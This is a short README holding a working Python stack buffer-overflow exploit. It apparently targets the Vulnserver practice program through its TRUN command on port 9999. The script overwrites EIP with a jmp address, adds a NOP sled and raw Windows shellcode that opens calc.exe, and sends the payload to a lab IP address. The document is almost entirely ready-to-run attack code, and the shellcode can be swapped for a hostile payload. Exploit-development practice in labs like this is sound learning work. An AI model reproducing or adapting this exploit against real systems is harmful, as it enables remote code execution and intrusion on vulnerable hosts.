README.md

This exploit is to serve as an example/reference and may not work for everyone.

Code

#!/bin/env python3
import socket
import struct

s = socket.socket()
total_length = 2984
offset = 2003
new_eip = struct.pack("<I", 0x62501203)
# 0x62501203 <-- This is the memory address of a jmp instruction to inset into EIP. You may have to change this.

nop_sled = b"\x90" * 16

# Shell Code To Open calc.exe
buf = b""
buf += b"\x89\xe5\x83\xec\x20\x31\xdb\x64\x8b\x5b\x30\x8b\x5b\x0c\x8b\x5b"
buf += b"\x1c\x8b\x1b\x8b\x1b\x8b\x43\x08\x89\x45\xfc\x8b\x58\x3c\x01\xc3"
buf += b"\x8b\x5b\x78\x01\xc3\x8b\x7b\x20\x01\xc7\x89\x7d\xf8\x8b\x4b\x24"
buf += b"\x01\xc1\x89\x4d\xf4\x8b\x53\x1c\x01\xc2\x89\x55\xf0\x8b\x53\x14"
buf += b"\x89\x55\xec\xeb\x32\x31\xc0\x8b\x55\xec\x8b\x7d\xf8\x8b\x75\x18"
buf += b"\x31\xc9\xfc\x8b\x3c\x87\x03\x7d\xfc\x66\x83\xc1\x08\xf3\xa6\x74"
buf += b"\x05\x40\x39\xd0\x72\xe4\x8b\x4d\xf4\x8b\x55\xf0\x66\x8b\x04\x41"
buf += b"\x8b\x04\x82\x03\x45\xfc\xc3\xba\x78\x78\x65\x63\xc1\xea\x08\x52"
buf += b"\x68\x57\x69\x6e\x45\x89\x65\x18\xe8\xb8\xff\xff\xff\x31\xc9\x51"
buf += b"\x68\x2e\x65\x78\x65\x68\x63\x61\x6c\x63\x89\xe3\x41\x51\x53\xff"
buf += b"\xd0\x31\xc9\xb9\x01\x65\x73\x73\xc1\xe9\x08\x51\x68\x50\x72\x6f"
buf += b"\x63\x68\x45\x78\x69\x74\x89\x65\x18\xe8\x87\xff\xff\xff\x31\xd2"
buf += b"\x52\xff\xd0"

payload = [
        b"TRUN /.:/",
        b"A"*offset,
        new_eip,
        nop_sled,
        buf,
        b"C"*(total_length - offset - len(nop_sled) - len(buf))
]

payload = b"".join(payload)
s.connect(("192.168.1.10", 9999)) # You obviously will have to edit the IP / Port if you want to use this.
s.send(payload)
s.close()